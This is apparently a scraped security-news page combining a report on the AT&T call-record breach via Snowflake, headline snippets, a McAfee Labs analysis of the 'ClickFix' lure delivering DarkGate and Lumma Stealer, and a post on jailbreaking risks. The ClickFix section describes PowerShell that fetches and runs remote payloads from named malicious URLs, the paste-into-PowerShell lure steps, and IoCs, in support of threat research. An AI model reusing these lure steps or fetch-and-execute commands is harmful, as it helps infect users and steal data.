News

AT&T Corp. disclosed today that a new data breach has exposed phone call and text message records for roughly 110 million people — nearly all of its customers. AT&T said it delayed disclosing the incident in response to “national security and public safety concerns,” noting that some of the records included data that could be used to determine where a call was made or text message sent. AT&T also acknowledged the customer records were exposed in a cloud database that was protected only by a username and password (no multi-factor authentication needed).

In a regulatory filing with the U.S. Securities and Exchange Commission today, AT&T said cyber intruders accessed an AT&T workspace on a third-party cloud platform in April, downloading files containing customer call and text interactions between May 1 and October 31, 2022, as well as on January 2, 2023.

The company said the stolen data includes records of calls and texts for mobile providers that resell AT&T’s service, but that it does not include the content of calls or texts, Social Security numbers, dates of birth, or any other personally identifiable information.

However, the company said a subset of stolen records included information about the location of cellular communications towers closest to the subscriber, data that could be used to determine the approximate location of the customer device initiating or receiving those text messages or phone calls.

“While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number,” AT&T allowed.

AT&T’s said it learned of the breach on April 19, but delayed disclosing it at the request of federal investigators. The company’s SEC disclosure says at least one individual has been detained by the authorities in connection with the breach.

In a written statement shared with KrebsOnSecurity, the FBI confirmed that it asked AT&T to delay notifying affected customers.

“Shortly after identifying a potential breach to customer data and before making its materiality decision, AT&T contacted the FBI to report the incident,” the FBI statement reads. “In assessing the nature of the breach, all parties discussed a potential delay to public reporting under Item 1.05(c) of the SEC Rule, due to potential risks to national security and/or public safety. AT&T, FBI, and DOJ worked collaboratively through the first and second delay process, all while sharing key threat intelligence to bolster FBI investigative equities and to assist AT&T’s incident response work.”

Techcrunch quoted an AT&T spokesperson saying the customer data was stolen as a result of a still-unfolding data breach involving more than 160 customers of the cloud data provider Snowflake.

Earlier this year, malicious hackers figured out that many major companies have uploaded massive amounts of valuable and sensitive customer data to Snowflake servers, all the while protecting those Snowflake accounts with little more than a username and password.

Wired reported last month how the hackers behind the Snowflake data thefts purchased stolen Snowflake credentials from dark web services that sell access to usernames, passwords and authentication tokens that are siphoned by information-stealing malware. For its part, Snowflake says it now requires all new customers to use multi-factor authentication.

Other companies with millions of customer records stolen from Snowflake servers include Advance Auto Parts, Allstate, Anheuser-Busch, Los Angeles Unified, Mitsubishi, Neiman Marcus, Progressive, Pure Storage, Santander Bank, State Farm, and Ticketmaster.

Earlier this year, AT&T reset passwords for millions of customers after the company finally acknowledged a data breach from 2018 involving approximately 7.6 million current AT&T account holders and roughly 65.4 million former account holders.

Mark Burnett is an application security architect, consultant and author. Burnett said the only real use for the data stolen in the most recent AT&T breach is to know who is contacting whom and how many times.

“The most concerning thing to me about this AT&T breach of ALL customer call and text records is that this isn’t one of their main databases; it is metadata on who is contacting who,” Burnett wrote on Mastodon. “Which makes me wonder what would call logs without timestamps or names have been used for.”

It remains unclear why so many major corporations persist in the belief that it is somehow acceptable to store so much sensitive customer data with so few security protections. For example, Advance Auto Parts said the data exposed included full names, Social Security numbers, drivers licenses and government issued ID numbers on 2.3 million people who were former employees or job applicants.

That may be because, apart from the class-action lawsuits that invariably ensue after these breaches, there is little holding companies accountable for sloppy security practices. AT&T told the SEC it does not believe this incident is likely to materially impact AT&T’s financial condition or results of operations. AT&T reported revenues of more than $30 billion in its most recent quarter.

An alert from the CISA and the FBI has urged software manufacturers to work towards the elimination of operating system (OS) command injection vulnerabilities

Operation Ticket Heist involves 700 web domains to sell fake Olympic Games tickets to a Russian-speaking audience, QuoIntelligence has found

Symantec figures suggest a 9% annual increase claimed ransomware attacks

Researchers at Elliptic claim multibillion dollar Huione Guarantee platform is enabler of scams and money laundering

600 IT/cybersecurity leaders share their ransomware experiences, revealing the realities facing education providers today.

Not a lot of details:

Apple has issued a new round of threat notifications to iPhone users across 98 countries, warning them of potential mercenary spyware attacks. It’s the second such alert campaign from the company this year, following a similar notification sent to users in 92 nations in April.

Yashvi Shah and Vignesh Dhatchanamoorthy

McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.

We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:

Figure 1:Prevalence for the last three months

Darkgate ingesting via “ClickFix”

DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email from the spamtrap, having an HTML attachment.

Figure 2: Email with Attachment

The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.

Figure 3: Displays extension problem issue

As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”

Before clicking on this button, let’s examine the underlying code. Upon examining the code, it was discovered that there were several base64-encoded content blocks present. Of particular significance was one found within the <Title> tag, which played a crucial role in this scenario.

Figure 4: HTML contains Base64-encoded content in the title tag

Decoding this we get,

Figure 5: After decoding the code

The decoded command demands PowerShell to carry out malicious activities on a system. It starts by downloading an HTA (HTML Application) file from the URL https://www.rockcreekdds.com/wp-content/1[.]hta and saves it locally as C:userspublicIx.hta.

The script then executes this HTA file using the start-process command, which initiates harmful actions on the system. Additionally, the script includes a command (Set-Clipboard -Value ‘ ‘) to clear the contents of the clipboard. After completing its tasks, the script terminates the PowerShell session with exit.

Upon further inspection of the HTML page, we found a javascript at the end of the code.

Figure 6: Decoding function snippet

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.

Let’s delve into it practically:

Figure 7: Clipboard contains malicious command

The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to further convince the user to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature.

Once the user does this, the HTA file gets downloaded.

Figure 8: HTA code snippet

The above file attempts to connect to the marked domain and execute a PowerShell file from this malicious source. Given below is the malicious script that is stored remotely and executed.

Figure 9: Powershell code snippet

As this PowerShell script is executed implicitly without any user interaction, a folder is created in the C drive where an AutoIt executable and script are dropped and executed automatically.

Figure 10: Downloaded zip contains AutoIT script

Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.

A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.

Lumma Stealer ingesting via “ClickFix”

McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.

Figure 11: Showing error on accessing the webpage

It directs the target user to perform the following steps:

1. Click on the “Copy Fix” button.
2. Right-click on the Windows icon.
3. Open Windows PowerShell (Admin).
4. Right-click within the open terminal window.
5. Wait for the update to complete.

Let’s analyze the code that gets copied when clicking the “Copy Fix” button.

Figure 12: Base64-encoded content

As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:

Figure 13: After decoding the Base64 content

This PowerShell script flushes the DNS cache and then decodes a base64-encoded command to fetch and execute a script from a remote URL https://weoleycastletaxis.co.uk/chao/baby/cow[.]html, masquerading the request with a specific User-Agent header. The fetched script is then executed, and the screen is cleared to hide the actions. Subsequently, it decodes another base64 string to execute a command that sets the clipboard content to a space character. The script is likely designed for malicious purposes, such as downloading and executing remote code covertly while attempting to hide its activity from the user.

Upon execution, the following process tree flashes:

Figure 14: Process Tree

As we know it is downloading the malware from the given URL, a new folder is created in a Temp folder and a zip is downloaded:

Figure 15: Network activity

The malware is unzipped and dropped in the same folder:

Figure 16: Dropped files

The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.

Conclusion:

In conclusion, the Clickfix social engineering technique showcases a highly effective and technical method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.

Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.

Mitigations:

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

1. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
2. Install and maintain updated antivirus and anti-malware software on all endpoints.
3. Implement robust email filtering to block phishing emails and malicious attachments.
4. Use web filtering solutions to prevent access to known malicious websites.
5. Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
6. Use network segmentation to limit the spread of malware within the organization.
7. Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
8. Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
9. Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
10. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
11. Continuously monitor and analyze system and network logs for signs of compromise.
12. Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
13. Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.

Indicators of Compromise (IoCs)

File	SHA256
DarkGate
Email	c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3
Html	0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889
HTA	5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf
PS	e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2
ZIP	8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1
AutoIT script	7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81
Lumma Stealer
URL	tuchinehd[.]com
PS	07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073
ZIP	6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8
EXE	e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9

 

The post ClickFix Deception: A Social Engineering Tactic to Deploy Malware appeared first on McAfee Blog.

In today’s interconnected world, our mobile devices serve as essential tools for communication, productivity, and entertainment. However, for some tech-savvy users, the allure of unlocking the full potential of their devices through jailbreaking (for iOS) or rooting (for Android) can be tempting. While these processes offer users greater control and customization over their devices, they also raise significant questions about security implications. 

What is jailbreaking? 

To “jailbreak” means to allow the phone’s owner to gain full access to the root of the operating system and access all the features. Jailbreaking is the process of removing the limitations imposed by Apple and associated carriers on devices running the iOS operating system. Jailbroken phones came into the mainstream when Apple first released their iPhone and it was only on AT&T’s network. Users who wanted to use an iPhone with other carriers were not able to unless they had a jailbroken iPhone. 

What is rooting? 

Similar to jailbreaking, “rooting” is the term for the process of removing the limitations on a mobile or tablet running the Android operating system. By gaining privileged control, often referred to as “root access,” over an Android device’s operating system, users can modify system files, remove pre-installed bloatware, install custom ROMs, and unlock features not accessible on stock devices.  

Why do people want to jailbreak or root?  

Rooting or jailbreaking grants users deeper access to the device’s operating system, allowing for extensive customization of the user interface, system settings, and even hardware functionality. Advanced users can optimize system performance, remove unnecessary bloatware, and tweak settings to improve battery life, speed, and responsiveness. 

Consequences of jailbreaking or rooting 

However, hacking your device potentially opens security holes that may have not been readily apparent or undermines the device’s built-in security measures. Jailbroken and rooted phones are much more susceptible to viruses and malware because users can avoid Apple and Google application vetting processes that help ensure users are downloading virus-free apps. 

In addition to security vulnerabilities, hacking your device may lead to a voided manufacturer’s warranty, leaving you without official support for repairs or replacements. Altering the device’s operating system can also lead to instability, crashes, and performance issues, especially if incompatible software or modifications are installed. 

While rooting or jailbreaking may offer users enticing opportunities for customization and optimization of their mobile devices, the associated risks cannot be overlooked. By circumventing built-in security measures, users expose their devices to potential security vulnerabilities, making them more susceptible to viruses and malware. Ultimately, the decision to root or jailbreak a mobile device should be made with careful consideration of the trade-offs involved, as the security risks often outweigh the benefits. 

When thinking about mobile security risks, consider adding reputable mobile security software to your device to augment the built-in security measures. These security solutions provide real-time scanning and threat detection capabilities, helping to safeguard sensitive data and maintain the integrity of the device’s operating system. 

The post How Does Jailbreaking Or Rooting Affect My Mobile Device Security? appeared first on McAfee Blog.

Smishing Triad’s MO involves registering fraudulent domain names that mimic legitimate organizations